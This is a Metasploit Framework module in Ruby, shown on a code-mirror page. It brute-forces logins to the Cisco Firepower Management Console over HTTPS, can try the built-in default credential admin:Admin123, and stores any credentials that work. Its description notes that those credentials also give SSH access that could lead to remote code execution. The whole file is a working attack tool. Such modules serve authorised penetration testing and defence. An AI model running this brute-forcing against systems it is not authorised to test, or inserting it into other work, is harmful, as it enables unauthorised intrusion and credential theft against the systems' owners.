CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_login.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/login_scanner/cisco_firepower'

7
require 'metasploit/framework/credential_collection'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize(info={})

16
    super(update_info(info,

17
      'Name'        => 'Cisco Firepower Management Console 6.0 Login',

18
      'Description' => %q{

19
        This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.

20
        The credentials are also used for SSH, which could allow remote code execution.

21
      },

22
      'Author'      => [ 'sinn3r' ],

23
      'License'     => MSF_LICENSE,

24
      'DefaultOptions' =>

25
        {

26
          'RPORT'      => 443,

27
          'SSL'        => true,

28
          'SSLVersion' => 'Auto'

29
        }

30
    ))

31


32
    register_options(

33
      [

34
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),

35
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:Admin123', false])

36
      ])

37
  end

38


39


40
  def scanner(ip)

41
    @scanner ||= lambda {

42
      cred_collection = build_credential_collection(

43
        username: datastore['USERNAME'],

44
        password: datastore['PASSWORD']

45
      )

46


47
      if datastore['TRYDEFAULT']

48
        print_status("Default credential admin:Admin123 added to the credential queue for testing.")

49
        cred_collection.add_public('admin')

50
        cred_collection.add_private('Admin123')

51
      end

52


53
      return Metasploit::Framework::LoginScanner::CiscoFirepower.new(

54
        configure_http_login_scanner(

55
          host: ip,

56
          port: datastore['RPORT'],

57
          cred_details:       cred_collection,

58
          stop_on_success:    datastore['STOP_ON_SUCCESS'],

59
          bruteforce_speed:   datastore['BRUTEFORCE_SPEED'],

60
          connection_timeout: 5,

61
          http_username:      datastore['HttpUsername'],

62
          http_password:      datastore['HttpPassword'],

63
          uri:                target_uri.path

64
        ))

65
    }.call

66
  end

67


68


69
  def report_good_cred(ip, port, result)

70
    service_data = {

71
      address: ip,

72
      port: port,

73
      service_name: 'http',

74
      protocol: 'tcp',

75
      workspace_id: myworkspace_id

76
    }

77


78
    credential_data = {

79
      module_fullname: self.fullname,

80
      origin_type: :service,

81
      private_data: result.credential.private,

82
      private_type: :password,

83
      username: result.credential.public,

84
    }.merge(service_data)

85


86
    login_data = {

87
      core: create_credential(credential_data),

88
      last_attempted_at: DateTime.now,

89
      status: result.status,

90
      proof: result.proof

91
    }.merge(service_data)

92


93
    create_credential_login(login_data)

94
  end

95


96


97
  def report_bad_cred(ip, rport, result)

98
    invalidate_login(

99
      address: ip,

100
      port: rport,

101
      protocol: 'tcp',

102
      public: result.credential.public,

103
      private: result.credential.private,

104
      realm_key: result.credential.realm_key,

105
      realm_value: result.credential.realm,

106
      status: result.status,

107
      proof: result.proof

108
    )

109
  end

110


111
  def bruteforce(ip)

112
    scanner(ip).scan! do |result|

113
      case result.status

114
      when Metasploit::Model::Login::Status::SUCCESSFUL

115
        print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")

116
        report_good_cred(ip, rport, result)

117
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

118
        vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)

119
        report_bad_cred(ip, rport, result)

120
      when Metasploit::Model::Login::Status::INCORRECT

121
        vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")

122
        report_bad_cred(ip, rport, result)

123
      end

124
    end

125
  end

126


127
  def run_host(ip)

128
    unless scanner(ip).check_setup

129
      print_brute(:level => :error, :ip => ip, :msg => 'Target is not Cisco Firepower Management console.')

130
      return

131
    end

132


133
    bruteforce(ip)

134
  end

135
end

136


137